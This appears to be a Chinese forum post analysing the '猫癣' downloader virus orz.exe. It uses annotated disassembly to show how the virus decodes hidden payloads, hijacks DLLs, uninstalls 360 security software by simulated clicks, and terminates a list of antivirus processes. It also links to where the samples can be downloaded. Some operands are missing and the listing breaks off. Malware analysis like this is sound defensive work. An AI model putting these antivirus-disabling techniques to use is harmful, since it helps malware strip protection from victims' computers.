猫癣(犇牛)病毒 主程序 orz.exe分析
From:bbs.pediy.com by:itcool从挂马简报里的被挂马的网站获得病毒样本..发现被挂都是同一个下载者..然后我对主程序就简要的
分析了下.. 发现是猫癣 不过这个也之前我分析的猫癣有些差异..
分析得到下载地址..然后又得到好多样本..多是游戏木马..哈哈..这下发了
样本下载 http://yben.ys168.com/
1 找到本进程的父进程..
实现:利用 GetCurrentProcessId 得到本进程的ID 在用Process32First 与 Process32Next 与ID比较 相等了,通过结构体获得父进程ID
{
00415CA6 |.56 push esi
00415CA7 |.57 push edi
00415CA8 |.33C0 xor eax,eax
00415CAA |.B9 49000000 mov ecx,49
00415CAF |.8D7C24 0C lea edi,dword ptr ss:
00415CB3 |.C74424 08 0000>mov dword ptr ss:,0
00415CBB |.50 push eax ; /ProcessID => 0
00415CBC |.6A 02 push 2 ; |Flags = TH32CS_SNAPPROCESS
00415CBE |.F3:AB rep stos dword ptr es: ; |
00415CC0 |.E8 37060000 call orz18.004162FC ; \CreateToolhelp32Snapshot
00415CC5 |.8BF0 mov esi,eax
00415CC7 |.83FE FF cmp esi,-1
00415CCA |.75 0B jnz short orz18.00415CD7
00415CCC |.5F pop edi
00415CCD |.33C0 xor eax,eax
00415CCF |.5E pop esi
00415CD0 |.81C4 28010000add esp,128
00415CD6 |.C3 retn
00415CD7 |>8D4424 08 lea eax,dword ptr ss:
00415CDB |.C74424 08 2801>mov dword ptr ss:,128
00415CE3 |.50 push eax ; /pProcessentry
00415CE4 |.56 push esi ; |hSnapshot
00415CE5 |.E8 0C060000 call orz18.004162F6 ; \Process32First
00415CEA |.85C0 test eax,eax
00415CEC |.74 21 je short orz18.00415D0F
00415CEE |.8B3D 5C104000mov edi,dword ptr ds: ;kernel32.GetCurrentProcessId
00415CF4 |.FFD7 call edi ; [GetCurrentProcessId
00415CF6 |.394424 10 cmp dword ptr ss:,eax
00415CFA |.74 13 je short orz18.00415D0F
00415CFC |>8D4C24 08 /lea ecx,dword ptr ss:
00415D00 |.51 |push ecx ; /pProcessentry
00415D01 |.56 |push esi ; |hSnapshot
00415D02 |.E8 E9050000 |call orz18.004162F0 ; \Process32Next
00415D07 |.FFD7 |call edi
00415D09 |.394424 10 |cmp dword ptr ss:,eax
00415D0D |.^ 75 ED \jnz short orz18.00415CFC
00415D0F |>8B4424 20 mov eax,dword ptr ss:
00415D13 |.5F pop edi
00415D14 |.5E pop esi
00415D15 |.81C4 28010000add esp,128
00415D1B \.C3 retn
}
2 创建 CreateMutexA 对象 判断创建的互斥体是否名为"oioipuy",若此互斥变量存在,则退出进程;
{
004161AE |> \68 F8434100 push orz18.004143F8 ; /MutexName = "oioipuy"
004161B3 |.6A 01 push 1 ; |InitialOwner = TRUE
004161B5 |.56 push esi ; |pSecurity
004161B6 |.FF15 74104000call dword ptr ds: ; \CreateMutexA
004161BC |.FF15 70104000call dword ptr ds: ;ntdll.RtlGetLastWin32Error
}
3 在C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\创建文件1696,创建之前先内存中还原1696
1696文件数据在内存中还原
{
00416170 33C0 xor eax,eax
00416172 B1 07 mov cl,7
00416174 8A90 24D74000 mov dl,byte ptr ds:-->指向内存缓冲区0040D704
0041617A 32D1 xor dl,cl
0041617C 8890 24D74000 mov byte ptr ds:,dl
00416182 40 inc eax
00416183 3D 802A0000 cmp eax,2A80
00416188 ^ 7C EA jl short orz18.00416174
}
4 在1696文件头部加MZ
{
00416136 FF15 A0104000 call dword ptr ds: ; kernel32.CreateFileA
0041613C 56 push esi
0041613D 8BF8 mov edi,eax
0041613F 56 push esi
00416140 56 push esi
00416141 57 push edi
00416142 FF15 60104000 call dword ptr ds: ; kernel32.SetFilePointer
00416148 8D45 08 lea eax,dword ptr ss:
0041614B 56 push esi
0041614C 50 push eax
0041614D 6A 02 push 2
0041614F 68 74434100 push orz18.00414374 ; ASCII "MZ"
00416154 57 push edi
00416155 FF15 A4104000 call dword ptr ds: ; kernel32.WriteFile
0041615B 57 push edi
0041615C FF15 AC104000 call dword ptr ds: ; kernel32.CloseHandle
}
004158A7 68 30D54000 push orz18.0040D530 ; ASCII "safeboxTray.exe"
5 在内存中把 safeboxTray.exe 360tray.exe usp10.dll /u. 还原出来
还原过程 00414960
{
0041498A |> /8A0C32 /mov cl,byte ptr ds:
0041498D |. |8AC2 |mov al,dl
0041498F |. |2C 3B |sub al,3B
00414991 |. |8BFE |mov edi,esi
00414993 |. |D0E0 |shl al,1
00414995 |. |02C8 |add cl,al
00414997 |. |33C0 |xor eax,eax
00414999 |. |880C32 |mov byte ptr ds:,cl
0041499C |. |83C9 FF |or ecx,FFFFFFFF
0041499F |. |42 |inc edx
004149A0 |. |F2:AE |repne scas byte ptr es:
004149A2 |. |F7D1 |not ecx
004149A4 |. |49 |dec ecx
004149A5 |. |3BD1 |cmp edx,ecx
004149A7 |.^\72 E1 \jb short orz18.0041498A
}
6 在进程中查找 safeboxTray.exe,找到之后打开该进程,在用EnumProcessModulesGetModuleFileNameExA
得到路径C:\Program Files\360\360safebox\SafeBoxtray.exe
7 替换文件,然后把rptup.dll在内存里数据还原,在创建C:\Program Files\360\360safebox\rptup.dll
实现 : MoveFileExA(C:\Program Files\360\360safebox\rptup.dll,新C:\Program Files\360\360safebox\libspyerps.dat")
00415ACA |.E8 F1EDFFFF call orz18.004148C0
{
rptup.dll在内存里数据还原
{
004148A4 |> /8A90 30114000/mov dl,byte ptr ds:
004148AA |. |32D1 |xor dl,cl
004148AC |. |8890 30114000|mov byte ptr ds:,dl
004148B2 |. |40 |inc eax
004148B3 |. |3D 00C40000 |cmp eax,0C400
004148B8 |.^\7C EA \jl short orz18.004148A4
}
}
8 创建C:\Program Files\360\360safebox\usp10.dll
9 创建一个进程 执行 C:\Program Files\360\360safebox\SafeBoxtray.exe /u,然后弹出360保险箱卸
模拟鼠标点击
{
004153B6 |.56 push esi
004153B7 |.57 push edi
004153B8 |.FF15 F8104000call dword ptr ds: ; [\\ GetForegroundWindow返回前台窗口
004153BE |.8BF0 mov esi,eax
004153C0 |.B9 40000000 mov ecx,40
004153C5 |.33C0 xor eax,eax
004153C7 |.8D7C24 21 lea edi,dword ptr ss:
004153CB |.C64424 20 00 mov byte ptr ss:,0
004153D0 |.68 04010000 push 104 ; /Count = 104 (260.)
004153D5 |.F3:AB rep stos dword ptr es: ; |
004153D7 |.66:AB stos word ptr es: ; |
004153D9 |.AA stos byte ptr es: ; |
004153DA |.8D4424 24 lea eax,dword ptr ss: ; |
004153DE |.50 push eax ; |Buffer
004153DF |.56 push esi ; |hWnd
004153E0 |.FF15 20114000call dword ptr ds: ; \GetWindowTextA
004153E6 |.8D4C24 08 lea ecx,dword ptr ss:
004153EA |.51 push ecx ; /pPoint
004153EB |.FF15 14114000call dword ptr ds: ; \GetCursorPos
004153F1 |.8D5424 20 lea edx,dword ptr ss:
004153F5 |.68 50D54000 push orz18.0040D550 ; /s2 = "360保险箱提示"
004153FA |.52 push edx ; |s1
004153FB |.E8 300F0000 call orz18.00416330 ; \_stricmp
00415400 |.83C4 08 add esp,8
00415403 |.85C0 test eax,eax
00415405 |.75 68 jnz short orz18.0041546F
00415407 |.53 push ebx
00415408 |.8D4424 14 lea eax,dword ptr ss:
0041540C |.55 push ebp
0041540D |.50 push eax ; /pRect
0041540E |.56 push esi ; |hWnd
0041540F |.FF15 FC104000call dword ptr ds: ; \\\ \\GetWindowRect 窗口的边框矩形的尺寸
00415415 |.8B5424 1C mov edx,dword ptr ss:
00415419 |.8B4C24 20 mov ecx,dword ptr ss:
0041541D |.8B1D F4104000mov ebx,dword ptr ds: ;USER32.SetCursorPos
00415423 |.8DBA BE000000lea edi,dword ptr ds:
00415429 |.8DB1 1AFFFFFFlea esi,dword ptr ds:
0041542F |.57 push edi ; /Y
00415430 |.56 push esi ; |X
00415431 |.FFD3 call ebx ; \SetCursorPos
00415433 |.8B2D F0104000mov ebp,dword ptr ds: ;USER32.mouse_event
00415439 |.6A 00 push 0 ; /ExtraInfo = 0
0041543B |.6A 00 push 0 ; |Reserved = 0
0041543D |.57 push edi ; |dY
0041543E |.56 push esi ; |dX
0041543F |.68 02800000 push 8002 ; |Flags = MOUSEEVENTF_LEFTDOWN|MOUSEEVENTF_ABSOLUTE
00415444 |.FFD5 call ebp ; \mouse_event
00415446 |.6A 00 push 0 ; /ExtraInfo = 0
00415448 |.6A 00 push 0 ; |Reserved = 0
0041544A |.57 push edi ; |dY
0041544B |.56 push esi ; |dX
0041544C |.68 04800000 push 8004 ; |Flags = MOUSEEVENTF_LEFTUP|MOUSEEVENTF_ABSOLUTE
00415451 |.FFD5 call ebp ; \mouse_event
00415453 |.8B4424 14 mov eax,dword ptr ss:
00415457 |.8B4C24 10 mov ecx,dword ptr ss:
0041545B |.50 push eax ; /Y
0041545C |.51 push ecx ; |X
0041545D |.FFD3 call ebx ; \SetCursorPos
0041545F |.5D pop ebp
00415460 |.5B pop ebx ;USER32.SetCursorPos
00415461 |.5F pop edi
00415462 |.B8 01000000 mov eax,1
00415467 |.5E pop esi
00415468 |.81C4 1C010000add esp,11C
0041546E |.C3 retn
}
10 结束进程 safeboxTray.exe 360tray.exe
00415B28 |> \E8 13FBFFFF call orz18.00415640
{
00415671 |.55 push ebp
00415672 |.50 push eax ; /pProcessentry
00415673 |.56 push esi ; |hSnapshot
00415674 |.C74424 18 2801>mov dword ptr ss:,128 ; |
0041567C |.E8 750C0000 call orz18.004162F6 ; \Process32First
00415681 |.8B2D AC104000mov ebp,dword ptr ds: ;kernel32.CloseHandle
00415687 |.85C0 test eax,eax
00415689 |.0F84 84000000je orz18.00415713
0041568F |.53 push ebx
00415690 |.8B1D 24114000mov ebx,dword ptr ds: ;USER32.MessageBoxA
00415696 |.57 push edi
00415697 |.8B3D 88104000mov edi,dword ptr ds: ;kernel32.Sleep
0041569D |>8D4C24 3C /lea ecx,dword ptr ss:
004156A1 |.68 30D54000 |push orz18.0040D530 ; /String2 = "safeboxTray.exe"
004156A6 |.51 |push ecx ; |String1
004156A7 |.FF15 40104000|call dword ptr ds: ; \lstrcmpiA
004156AD |.85C0 |test eax,eax
004156AF |.74 14 |je short orz18.004156C5
004156B1 |.8D5424 3C |lea edx,dword ptr ss:
004156B5 |.68 40D54000 |push orz18.0040D540 ; /String2 = "360tray.exe"
004156BA |.52 |push edx ; |String1
004156BB |.FF15 40104000|call dword ptr ds: ; \lstrcmpiA
004156C1 |.85C0 |test eax,eax
004156C3 |.75 3D |jnz short orz18.00415702
004156C5 |>8B4424 20 |mov eax,dword ptr ss:
004156C9 |.50 |push eax ; /ProcessId
004156CA |.6A 00 |push 0 ; |Inheritable = FALSE
004156CC |.6A 01 |push 1 ; |Access = TERMINATE
004156CE |.FF15 98104000|call dword ptr ds: ; \OpenProcess
004156D4 |.8BF0 |mov esi,eax
004156D6 |.85F6 |test esi,esi
004156D8 |.74 0D |je short orz18.004156E7
004156DA |.6A 00 |push 0 ; /ExitCode = 0
004156DC |.56 |push esi ; |hProcess
004156DD |.FF15 9C104000|call dword ptr ds: ; \TerminateProcess
004156E3 |.894424 10 |mov dword ptr ss:,eax
004156E7 |>56 |push esi
004156E8 |.FFD5 |call ebp //CloseHandle
004156EA |.6A 0A |push 0A
004156EC |.FFD7 |call edi //sleep
004156EE |.6A 00 |push 0
004156F0 |.68 58664100 |push orz18.00416658
004156F5 |.68 58664100 |push orz18.00416658
004156FA |.6A FF |push -1
004156FC |.FFD3 |call ebx
004156FE |.8B7424 14 |mov esi,dword ptr ss:
00415702 |>8D4C24 18 |lea ecx,dword ptr ss:
00415706 |.51 |push ecx ; /pProcessentry
00415707 |.56 |push esi ; |hSnapshot
00415708 |.E8 E30B0000 |call orz18.004162F0 ; \Process32Next
0041570D |.85C0 |test eax,eax
0041570F |.^ 75 8C \jnz short orz18.0041569D
00415711 |.5F pop edi
00415712 |.5B pop ebx
00415713 |>56 push esi
00415714 |.FFD5 call ebp //CloseHandle
00415716 |.8B4424 08 mov eax,dword ptr ss:
0041571A |.5D pop ebp
0041571B |.5E pop esi
0041571C |.81C4 30010000add esp,130
00415722 \.C3 retn
}
11 在进程中查找 360tray.exe,找到之后打开该进程,在用EnumProcessModulesGetModuleFileNameExA ,
得到路径C:\Program Files\360\360Safe\safemon\360tray.exe,由这个路径得到C:\Program Files\360\360Safe\+++deepscan\uninst.exe
CopyFileA(C:\Program Files\360\360Safe\uninst.exe,新C:\Program Files\360\360Safe\+++deepscan\uninst.exe)
{
0041506E |.50 push eax ; |NewFileName
0041506F |.F3:A4 rep movs byte ptr es:,byte ptr ds: ; |
00415071 |.8D8C24 4C02000>lea ecx,dword ptr ss: ; |
00415078 |.51 push ecx ; |ExistingFileName
00415079 |.FF15 3C104000call dword ptr ds: ; \CopyFileA
}
12 创建 C:\Program Files\360\360Safe\deepscan\usp10.dll
实现:
数据还原
{
004148A4 |> /8A90 30114000/mov dl,byte ptr ds:
004148AA |. |32D1 |xor dl,cl
004148AC |. |8890 30114000|mov byte ptr ds:,dl
004148B2 |. |40 |inc eax
004148B3 |. |3D 00C40000 |cmp eax,0C400
004148B8 |.^\7C EA \jl short orz18.004148A4
}
关键00415B2D |.E8 EEF2FFFF call orz18.00414E20
00415100 |.FF15 34104000call dword ptr ds: ; \CreateThread
13 创建一个线程
004150E9 |.6A 0A push 0A ; /Timeout = 10. ms
004150EB |.FF15 88104000call dword ptr ds: ; \Sleep
004150F1 |.6A 00 push 0 ; /pThreadId = NULL
004150F3 |.6A 00 push 0 ; |CreationFlags = 0
004150F5 |.6A 00 push 0 ; |pThreadParm = NULL
004150F7 |.68 304D4100 push orz18.00414D30 ; |ThreadFunction = orz18.00414D30
004150FC |.6A 00 push 0 ; |StackSize = 0
004150FE |.6A 00 push 0 ; |pSecurity = NULL
00415100 |.FF15 34104000call dword ptr ds: ; \CreateThread
00415106 |.8D4424 18 lea eax,dword ptr ss:
0041510A |.50 push eax ; /Arg1
0041510B |.E8 80FCFFFF call orz18.00414D90 ; \orz18.00414D90
线程函数
{
发消息卸载 呵呵
{
00414A70 /$56 push esi
00414A71 |.68 8CD54000 push orz18.0040D58C ; /Title = "360安全卫士"
00414A76 |.68 A0D54000 push orz18.0040D5A0 ; |Class = "#32770"
00414A7B |.FF15 28114000call dword ptr ds: ; \FindWindowA
00414A81 |.85C0 test eax,eax
00414A83 |.74 60 je short orz18.00414AE5
00414A85 |.68 A8D54000 push orz18.0040D5A8 ; /Title = "是"
00414A8A |.68 98D54000 push orz18.0040D598 ; |Class = "Button"
00414A8F |.6A 00 push 0 ; |hAfterWnd = NULL
00414A91 |.50 push eax ; |hParent
00414A92 |.FF15 08114000call dword ptr ds: ; \FindWindowExA
00414A98 |.8BF0 mov esi,eax
00414A9A |.85F6 test esi,esi
00414A9C |.74 47 je short orz18.00414AE5
00414A9E |.57 push edi
00414A9F |.8B3D 0C114000mov edi,dword ptr ds: ;USER32.SendMessageA
00414AA5 |.6A 00 push 0 ; /lParam = 0
00414AA7 |.6A 00 push 0 ; |wParam = 0
00414AA9 |.68 01020000 push 201 ; |Message = WM_LBUTTONDOWN
00414AAE |.56 push esi ; |hWnd
00414AAF |.FFD7 call edi ; \SendMessageA
00414AB1 |.6A 00 push 0 ; /lParam = 0
00414AB3 |.6A 00 push 0 ; |wParam = 0
00414AB5 |.68 02020000 push 202 ; |Message = WM_LBUTTONUP
00414ABA |.56 push esi ; |hWnd
00414ABB |.FFD7 call edi ; \SendMessageA
00414ABD |.6A 0A push 0A ; /Timeout = 10. ms
00414ABF |.FF15 88104000call dword ptr ds: ; \Sleep
00414AC5 |.6A 00 push 0 ; /lParam = 0
00414AC7 |.6A 00 push 0 ; |wParam = 0
00414AC9 |.68 01020000 push 201 ; |Message = WM_LBUTTONDOWN
00414ACE |.56 push esi ; |hWnd
00414ACF |.FFD7 call edi ; \SendMessageA
00414AD1 |.6A 00 push 0 ; /lParam = 0
00414AD3 |.6A 00 push 0 ; |wParam = 0
00414AD5 |.68 02020000 push 202 ; |Message = WM_LBUTTONUP
00414ADA |.56 push esi ; |hWnd
00414ADB |.FFD7 call edi ; \SendMessageA
00414ADD |.5F pop edi
00414ADE |.B8 01000000 mov eax,1
00414AE3 |.5E pop esi
00414AE4 |.C3 retn
00414AE5 |>33C0 xor eax,eax
00414AE7 |.5E pop esi
00414AE8 \.C3 retn
}
}
14 创建一个进程执行C:\Program Files\360\360Safe\deepscan\uninst.exe_?=C:\D
0041510B |.E8 80FCFFFF
{
00414D90 /$83EC 54 sub esp,54
00414D93 |.33C0 xor eax,eax
00414D95 |.57 push edi
00414D96 |.894424 08 mov dword ptr ss:,eax
00414D9A |.B9 10000000 mov ecx,10
00414D9F |.894424 0C mov dword ptr ss:,eax
00414DA3 |.8D7C24 18 lea edi,dword ptr ss:
00414DA7 |.F3:AB rep stos dword ptr es:
00414DA9 |.8D4C24 04 lea ecx,dword ptr ss:
00414DAD |.8D5424 14 lea edx,dword ptr ss:
00414DB1 |.51 push ecx ; /pProcessInfo
00414DB2 |.52 push edx ; |pStartupInfo
00414DB3 |.50 push eax ; |CurrentDir => NULL
00414DB4 |.50 push eax ; |pEnvironment => NULL
00414DB5 |.50 push eax ; |CreationFlags => 0
00414DB6 |.50 push eax ; |InheritHandles => FALSE
00414DB7 |.50 push eax ; |pThreadSecurity => NULL
00414DB8 |.894424 2C mov dword ptr ss:,eax ; |
00414DBC |.66:894424 60 mov word ptr ss:,ax ; |
00414DC1 |.50 push eax ; |pProcessSecurity => NULL
00414DC2 |.8B4424 7C mov eax,dword ptr ss: ; |
00414DC6 |.C74424 24 0000>mov dword ptr ss:,0 ; |
00414DCE |.50 push eax ; |CommandLine
00414DCF |.6A 00 push 0 ; |ModuleFileName = NULL
00414DD1 |.C74424 3C 4400>mov dword ptr ss:,44 ; |
00414DD9 |.C74424 68 0100>mov dword ptr ss:,1 ; |
00414DE1 |.FF15 38104000call dword ptr ds: ; \CreateProcessA
00414DE7 |.6A FF push -1 ; /Timeout = INFINITE
00414DE9 |.8B4C24 08 mov ecx,dword ptr ss: ; |
00414DED |.51 push ecx ; |hProcess
00414DEE |.FF15 04114000call dword ptr ds: ; \WaitForInputIdle
00414DF4 |.6A 00 push 0 ; /pThreadId = NULL
00414DF6 |.6A 00 push 0 ; |CreationFlags = 0
00414DF8 |.6A 00 push 0 ; |pThreadParm = NULL
00414DFA |.68 F0494100 push orz18.004149F0 ; |ThreadFunction = orz18.004149F0
00414DFF |.6A 00 push 0 ; |StackSize = 0
00414E01 |.6A 00 push 0 ; |pSecurity = NULL
00414E03 |.FF15 34104000call dword ptr ds: ; \CreateThread
00414E09 |.33C0 xor eax,eax
00414E0B |.5F pop edi
00414E0C |.83C4 54 add esp,54
00414E0F \.C2 0400 retn 4
}
15 卸了之后有创建一条线程 删除C:\Program Files\360\360Safe\deepscan\usp10.dll
线程 004149F0
{
004149F0 .53 push ebx
004149F1 .56 push esi
004149F2 .8B35 88104000mov esi,dword ptr ds: ;kernel32.Sleep
004149F8 .57 push edi
004149F9 .8B3D 7C104000mov edi,dword ptr ds: ;kernel32.DeleteFileA
004149FF .33DB xor ebx,ebx
00414A01 >68 2C010000 push 12C
00414A06 .FFD6 call esi
00414A08 .68 54654100 push orz18.00416554 ;ASCII "C:\Program Files\360\360Safe\deepscan\usp10.dll"
00414A0D .FFD7 call edi
00414A0F .85C0 test eax,eax
00414A11 .75 0D jnz short orz18.00414A20
00414A13 .43 inc ebx
00414A14 .81FB 96000000cmp ebx,96
00414A1A .^ 7C E5 jl short orz18.00414A01
00414A1C .5F pop edi
00414A1D .5E pop esi
00414A1E .5B pop ebx
}
16 删除 C:\Program Files\360\360safebox\usp10.dll C:\Program Files\360\360safebox\rptup.dll
用rptup.dll替换libspyerps.dat
00415B3C |.50 push eax ; /C:\Program Files\360\360safebox\usp10.dll
00415B3D |.FFD6 call esi ; \DeleteFileA
00415B3F |.8D4C24 78 lea ecx,dword ptr ss:[esp+>
00415B43 |.51 push ecx ; /C:\Program Files\360\360safebox\rptup.dll
00415B44 |.FFD6 call esi ; \DeleteFileA
00415B46 |.8D5424 78 lea edx,dword ptr ss:[esp+>
00415B4A |.6A 01 push 1 ; /Flags = REPLACE_EXISTING
00415B4C |.8D8424 8001000>lea eax,dword ptr ss:[esp+>; |
00415B53 |.52 push edx ; |C:\Program Files\360\360safebox\rptup.dll
00415B54 |.50 push eax ; |ExistingFileExA C:\Program Files\360\360safebox\libspyerps.dat
00415B55 |.FF15 50104000call dword ptr ds: ; \MoveFileExA
17 查杀进程
kavstart.exe.kissvc.exe.kmailmon.exe.kpfw32.exe.kpfwsvc.exe.kwatch.exe.ccenter.exe.ras.exe.
rstray.exe.rsagent.exe..ravtask.exe.ravstub.exe.ravmon.exe.ravmond.exe.avp.exe.360safebox.exe.
360Safe.exe.Thunder5.exe.rfwmain.exe.rfwstub.exe.rfwsrv.exe..
{
00415EC0 /$81EC 30010000sub esp,130
00415EC6 |.56 push esi
00415EC7 |.6A 00 push 0 ; /ProcessID = 0
00415EC9 |.6A 02 push 2 ; |Flags = TH32CS_SNAPPROCESS
00415ECB |.C64424 0F 00 mov byte ptr ss:,0 ; |
00415ED0 |.E8 27040000 call orz18.004162FC ; \CreateToolhelp32Snapshot
00415ED5 |.8BF0 mov esi,eax
00415ED7 |.83FE FF cmp esi,-1
00415EDA |.897424 08 mov dword ptr ss:,esi
00415EDE |.75 0A jnz short orz18.00415EEA
00415EE0 |.32C0 xor al,al
00415EE2 |.5E pop esi
00415EE3 |.81C4 30010000add esp,130
00415EE9 |.C3 retn
00415EEA |>8D4424 0C lea eax,dword ptr ss:
00415EEE |.C74424 0C 2801>mov dword ptr ss:,128
00415EF6 |.50 push eax ; /pProcessentry
00415EF7 |.56 push esi ; |hSnapshot
00415EF8 |.E8 F9030000 call orz18.004162F6 ; \Process32First
00415EFD |.85C0 test eax,eax
00415EFF |.0F84 B0000000je orz18.00415FB5
00415F05 |.53 push ebx
00415F06 |.8B1D 98104000mov ebx,dword ptr ds: ;kernel32.OpenProcess
00415F0C |.55 push ebp
00415F0D |.57 push edi
00415F0E |>33ED /xor ebp,ebp
00415F10 |>8BCD |/mov ecx,ebp
00415F12 |.33C0 ||xor eax,eax
00415F14 |.C1E1 04 ||shl ecx,4
00415F17 |.8DB429 ACD5400>||lea esi,dword ptr ds:
00415F1E |.83C9 FF ||or ecx,FFFFFFFF
00415F21 |.8BFE ||mov edi,esi
00415F23 |.F2:AE ||repne scas byte ptr es:
00415F25 |.F7D1 ||not ecx
00415F27 |.49 ||dec ecx
00415F28 |.83F9 04 ||cmp ecx,4
00415F2B |.72 56 ||jb short orz18.00415F83
00415F2D |.A0 22D74000 ||mov al,byte ptr ds:
00415F32 |.84C0 ||test al,al
00415F34 |.74 09 ||je short orz18.00415F3F
00415F36 |.56 ||push esi
00415F37 |.E8 E4FDFFFF ||call orz18.00415D20 ;//还原数据 要杀的进程
00415F3C |.83C4 04 ||add esp,4
00415F3F |>8D5424 3C ||lea edx,dword ptr ss:
00415F43 |.56 ||push esi ; /String2
00415F44 |.52 ||push edx ; |String1
00415F45 |.FF15 40104000||call dword ptr ds: ; \lstrcmpiA
00415F4B |.85C0 ||test eax,eax
00415F4D |.75 34 ||jnz short orz18.00415F83
00415F4F |.83FD 11 ||cmp ebp,11
00415F52 |.75 37 ||jnz short orz18.00415F8B
00415F54 |.8B4424 20 ||mov eax,dword ptr ss:
00415F58 |.50 ||push eax
00415F59 |.6A 00 ||push 0
00415F5B |.6A 01 ||push 1
00415F5D |.FFD3 ||call ebx
00415F5F |.6A 00 ||push 0 ; /Style = MB_OK|MB_APPLMODAL
00415F61 |.6A 00 ||push 0 ; |Title = NULL
00415F63 |.6A 00 ||push 0 ; |Text = NULL
00415F65 |.6A FD ||push -3 ; |hOwner = FFFFFFFD
00415F67 |.8BF0 ||mov esi,eax ; |
00415F69 |.FF15 24114000||call dword ptr ds: ; \MessageBoxA
00415F6F |.85F6 ||test esi,esi
00415F71 |.74 18 ||je short orz18.00415F8B
00415F73 |.6A 00 ||push 0 ; /ExitCode = 0
00415F75 |.56 ||push esi ; |hProcess
00415F76 |.FF15 9C104000||call dword ptr ds: ; \TerminateProcess
00415F7C |.56 ||push esi ; /hObject
00415F7D |.FF15 AC104000||call dword ptr ds: ; \CloseHandle
00415F83 |>45 ||inc ebp
00415F84 |.83FD 16 ||cmp ebp,16
00415F87 |.^ 7C 87 |\jl short orz18.00415F10
00415F89 |.EB 05 |jmp short orz18.00415F90
00415F8B |>C64424 13 01 |mov byte ptr ss:,1
00415F90 |>8B5424 14 |mov edx,dword ptr ss:
00415F94 |.8D4C24 18 |lea ecx,dword ptr ss:
00415F98 |.51 |push ecx ; /pProcessentry
00415F99 |.52 |push edx ; |hSnapshot
00415F9A |.C605 22D74000 >|mov byte ptr ds:,0 ; |
00415FA1 |.E8 4A030000 |call orz18.004162F0 ; \Process32Next
00415FA6 |.85C0 |test eax,eax
00415FA8 |.^ 0F85 60FFFFFF\jnz orz18.00415F0E
00415FAE |.8B7424 14 mov esi,dword ptr ss:
00415FB2 |.5F pop edi
00415FB3 |.5D pop ebp
00415FB4 |.5B pop ebx
00415FB5 |>56 push esi ; /hObject
00415FB6 |.FF15 AC104000call dword ptr ds: ; \CloseHandle
00415FBC |.8A4424 07 mov al,byte ptr ss:
00415FC0 |.5E pop esi
00415FC1 |.81C4 30010000add esp,130
00415FC7 \.C3 retn
}
18 创建文件 C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\\12234.dll
00415E7A |.E8 41EAFFFF call orz18.004148C0创建
00415E84 |.E8 D7FEFFFF call orz18.00415D60给文件加MZ
执行 rundll32.exe....C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\\12234.dll
00415EA1 |.6A 00 push 0 ; /IsShown = 0
00415EA3 |.6A 00 push 0 ; |DefDir = NULL
00415EA5 |.50 push eax ; |Parameters
00415EA6 |.51 push ecx ; |FileName
00415EA7 |.68 58664100 push orz18.00416658 ; |Operation = ""
00415EAC |.6A 00 push 0 ; |hWnd = NULL
00415EAE |.FF15 E0104000call dword ptr ds: ; \ShellExecuteA
19 通过本进程ID得到 进程结构
{
00415CE3 |.50 push eax ; /pProcessentry
00415CE4 |.56 push esi ; |hSnapshot
00415CE5 |.E8 0C060000 call orz18.004162F6 ; \Process32First
00415CEA |.85C0 test eax,eax
00415CEC |.74 21 je short orz18.00415D0F
00415CEE |.8B3D 5C104000mov edi,dword ptr ds: ;kernel32.GetCurrentProcessId
00415CF4 |.FFD7 call edi ; [GetCurrentProcessId
00415CF6 |.394424 10 cmp dword ptr ss:,eax
00415CFA |.74 13 je short orz18.00415D0F
00415CFC |>8D4C24 08 /lea ecx,dword ptr ss:
00415D00 |.51 |push ecx ; /pProcessentry
00415D01 |.56 |push esi ; |hSnapshot
00415D02 |.E8 E9050000 |call orz18.004162F0 ; \Process32Next
00415D07 |.FFD7 |call edi ;kernel32.GetCurrentProcessId
00415D09 |.394424 10 |cmp dword ptr ss:,eax
00415D0D |.^ 75 ED \jnz short orz18.00415CFC
}
20
{
0041602F /$55 push ebp
00416030 |.8BEC mov ebp,esp
00416032 |.81EC 08010000sub esp,108
00416038 |.56 push esi
00416039 |.57 push edi
0041603A |.8D85 F8FEFFFFlea eax,dword ptr ss:
00416040 |.68 04010000 push 104 ; /BufSize = 104 (260.)
00416045 |.33F6 xor esi,esi ; |
00416047 |.50 push eax ; |PathBuffer
00416048 |.56 push esi ; |hModule => NULL
00416049 |.FF15 6C104000call dword ptr ds: ; \GetModuleFileNameA
0041604F |.68 60EA0000 push 0EA60 ; /Timeout = 60000. ms
00416054 |.FF15 88104000call dword ptr ds: ; \Sleep
0041605A |.56 push esi ; /Style => MB_OK|MB_APPLMODAL
0041605B |.68 58664100 push orz18.00416658 ; |Title = ""
00416060 |.68 DC434100 push orz18.004143DC ; |Text = "..."
00416065 |.6A FF push -1 ; |hOwner = FFFFFFFF
00416067 |.FF15 24114000call dword ptr ds: ; \MessageBoxA
0041606D |.56 push esi ; /pThreadId => NULL
0041606E |.56 push esi ; |CreationFlags => 0
0041606F |.56 push esi ; |pThreadParm => NULL
00416070 |.68 30574100 push orz18.00415730 ; |ThreadFunction = orz18.00415730
00416075 |.56 push esi ; |StackSize => 0
00416076 |.56 push esi ; |pSecurity => NULL
00416077 |.FF15 34104000call dword ptr ds: ; \CreateThread
0041607D |.6A 04 push 4 ; /Flags = DELAY_UNTIL_REBOOT
0041607F |.8D85 F8FEFFFFlea eax,dword ptr ss: ; |
00416085 |.56 push esi ; |NewName => NULL //
00416086 |.50 push eax ; |ExistingName
00416087 |.FF15 50104000call dword ptr ds: ; \MoveFileExA
0041608D |.E8 DEFAFFFF call orz18.00415B70 //提高进程权限
00416092 |.68 48644100 push orz18.00416448 ;ASCII "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\1696"
00416097 |.E8 34FFFFFF call orz18.00415FD0
0041609C |.59 pop ecx
0041609D |.56 push esi ; /hTemplateFile => NULL
0041609E |.56 push esi ; |Attributes => 0
0041609F |.6A 03 push 3 ; |Mode = OPEN_EXISTING
004160A1 |.56 push esi ; |pSecurity => NULL
004160A2 |.56 push esi ; |ShareMode => 0
004160A3 |.68 00000080 push 80000000 ; |Access = GENERIC_READ
004160A8 |.68 CC434100 push orz18.004143CC ; |FileName = "\\.\safebreas"
004160AD |.FF15 A0104000call dword ptr ds: ; \CreateFileA
004160B3 |.8BF8 mov edi,eax
004160B5 |.83FF FF cmp edi,-1
004160B8 |.74 1D je short orz18.004160D7
004160BA |.8D45 FC lea eax,dword ptr ss:
004160BD |.56 push esi ; /pOverlapped => NULL
004160BE |.50 push eax ; |pBytesReturned
